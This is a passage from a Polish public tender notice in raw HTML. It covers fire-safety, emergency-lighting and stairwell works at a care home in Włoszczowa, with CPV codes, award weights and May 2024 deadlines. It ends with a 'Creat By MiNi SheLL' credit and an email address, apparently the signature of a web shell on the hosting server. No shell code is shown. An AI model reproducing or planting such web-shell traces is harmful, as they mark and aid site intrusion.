SWZ.<br/>d)	Przedmiarze robót instalacji elektrycznej dla oddymiania stanowiącej załącznik nr 12 do SWZ. <br/>e)	Projekcie technicznym instalacji elektrycznej wewnętrznej oświetlenia awaryjnego i ewakuacyjnego dla Domu Pomocy Społecznej we Włoszczowie ul. Koniecpolska 20 , stanowiącym załącznik nr 13 do SWZ.<br/>f)	Przedmiarze robót dla instalacji oświetlenia ewakuacyjnego i awaryjnego stanowiącym załącznik nr 14 do SWZ.<br/>g)	Projekcie dot. Sposobu dostosowania drogi ewakuacyjnej w budynku Domu Pomocy Społecznej we Włoszczowie do aktualnych przepisów przeciwpożarowych dotyczących ewakuacji ludzi z budynku stanowiącym załącznik nr 15 do SWZ.<br/>h)	Przedmiarze robót dotyczących przystosowania klatki schodowej do przepisów p.poż. stanowiącym załącznik nr 16 do SWZ.<br/>6.	Pozostałe warunki realizacji zamówienia zostały określone w Projektowanych postanowieniach umowy w sprawie zamówienia publicznego, stanowiących załącznik nr 4 do SWZ.<br/>7.	Jeżeli Wykonawca stwierdzi, że użyte w SWZ i w załącznikach do SWZ normy krajowe lub normy<br/>europejskie lub normy międzynarodowe mogą wskazywać na producentów produktów lub źródła ich pochodzenia to Zamawiający dopuszcza w tym zakresie rozwiązania równoważne. Oznacza to, że parametry techniczne tak wskazanych produktów, określają wymagane przez Zamawiającego minimalne oczekiwania co do jakości produktów, które mają być użyte do wykonania przedmiotu umowy. Ponadto, w każdym przypadku stwierdzenie, że opis czy też cecha opisanego produktu, która może wskazywać na źródło pochodzenia lub producenta to Wykonawca również jest uprawniony do stosowania produktów równoważnych, przez które rozumie się takie, które posiadają parametry techniczne nie gorsze od tych wskazanych w SWZ i/lub w załącznikach do SWZ. Przy składaniu oferty równoważnej wymaganym jest, aby Wykonawca udowodnił Zamawiającemu, że oferowane przez niego urządzenia lub materiały są równoważne w stosunku do zaproponowanych w projekcie, przedstawiając niezbędną dokumentację potwierdzającą, że zaoferowane materiały/ urządzenia/wyroby zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji technicznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">31518200-2 - Oświetlenie awaryjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">28 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> •	Część IV – Przystosowanie klatki schodowej do przepisów p. poż.<br/>3.	Zakres rzeczowy zamówienia (odpowiednio dla wszystkich części 1-4) obejmuje wszystkie prace, czynności i roboty konieczne dla wykonania zadania inwestycyjnego, w tym następujące elementy:<br/>a) roboty rozbiórkowe i demontażowe;<br/>b) roboty budowlane i odtworzeniowe;<br/>c) roboty elektryczne;<br/>d) roboty montażowe;<br/>e) dostawa niezbędnych materiałów i wyposażenia;<br/>f) badanie i sprawdzenie prawidłowości funkcjonowania zastosowanych systemów i materiałów.<br/><br/>Ponadto, o ile dla wykonania robót budowlanych wchodzących w zakres przedmiotu zamówienia będzie konieczne wykonanie innych prac, czynności lub uzyskanie zezwoleń, to wykonawca wykona te prace i czynności oraz uzyska niezbędne zezwolenia własnym kosztem i staraniem<br/>4.	Wykonawca w ramach realizacji przedmiotu zamówienia nie jest zobowiązany do uzyskania pozwolenia na użytkowanie obiektów budowlanych objętych przedmiotem zamówienia ani do zawiadomienia organu nadzoru budowlanego o zakończeniu budowy.<br/>5.	Szczegółowy zakres zamówienia oraz warunki realizacji (specyfikacja techniczna wykonania i odbioru robót budowlanych) zostały określone w:<br/>a)	Projekcie technicznym zabudowy przeciwpożarowej dla Wyłącznika Prądu dla Domu Pomocy Społecznej we Włoszczowie przy ul. Koniecpolskiej 20 stanowiącym załącznik nr 9 do SWZ. <br/>b)	Przedmiarze robót dotyczących instalacji elektrycznej dla Wył PWP stanowiącym załącznik nr 10 do SWZ.<br/>c)	Projekcie technicznym instalacji elektrycznej wewnętrznej sterowania oddymianiem dla Domu Pomocy Społecznej we Włoszczowie ul. Koniecpolska 20 stanowiącym załącznik nr 11 do SWZ.<br/>d)	Przedmiarze robót instalacji elektrycznej dla oddymiania stanowiącej załącznik nr 12 do SWZ. <br/>e)	Projekcie technicznym instalacji elektrycznej wewnętrznej oświetlenia awaryjnego i ewakuacyjnego dla Domu Pomocy Społecznej we Włoszczowie ul. Koniecpolska 20 , stanowiącym załącznik nr 13 do SWZ.<br/>f)	Przedmiarze robót dla instalacji oświetlenia ewakuacyjnego i awaryjnego stanowiącym załącznik nr 14 do SWZ.<br/>g)	Projekcie dot. Sposobu dostosowania drogi ewakuacyjnej w budynku Domu Pomocy Społecznej we Włoszczowie do aktualnych przepisów przeciwpożarowych dotyczących ewakuacji ludzi z budynku stanowiącym załącznik nr 15 do SWZ.<br/>h)	Przedmiarze robót dotyczących przystosowania klatki schodowej do przepisów p.poż. stanowiącym załącznik nr 16 do SWZ.<br/>6.	Pozostałe warunki realizacji zamówienia zostały określone w Projektowanych postanowieniach umowy w sprawie zamówienia publicznego, stanowiących załącznik nr 4 do SWZ.<br/>7.	Jeżeli Wykonawca stwierdzi, że użyte w SWZ i w załącznikach do SWZ normy krajowe lub normy<br/>europejskie lub normy międzynarodowe mogą wskazywać na producentów produktów lub źródła ich pochodzenia to Zamawiający dopuszcza w tym zakresie rozwiązania równoważne. Oznacza to, że parametry techniczne tak wskazanych produktów, określają wymagane przez Zamawiającego minimalne oczekiwania co do jakości produktów, które mają być użyte do wykonania przedmiotu umowy. Ponadto, w każdym przypadku stwierdzenie, że opis czy też cecha opisanego produktu, która może wskazywać na źródło pochodzenia lub producenta to Wykonawca również jest uprawniony do stosowania produktów równoważnych, przez które rozumie się takie, które posiadają parametry techniczne nie gorsze od tych wskazanych w SWZ i/lub w załącznikach do SWZ. Przy składaniu oferty równoważnej wymaganym jest, aby Wykonawca udowodnił Zamawiającemu, że oferowane przez niego urządzenia lub materiały są równoważne w stosunku do zaproponowanych w projekcie, przedstawiając niezbędną dokumentację potwierdzającą, że zaoferowane materiały/ urządzenia/wyroby zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji technicznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">31625100-4 - Systemy wykrywania ognia</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">28 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie określa szczegółowych warunków w tym zakresie;<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie określa szczegółowych warunków w tym zakresie;<br/>3)	sytuacji ekonomicznej lub finansowej – Zamawiający nie określa szczegółowych warunków w tym zakresie;<br/>4)	zdolności technicznej lub zawodowej – Zamawiający określił warunki w rozdz. V SWZ.<br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie Zamówienia dołączają do oferty oświadczenie, z którego wynika, które z roboty wykonają poszczególni Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-23 00:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/925343</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-24 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com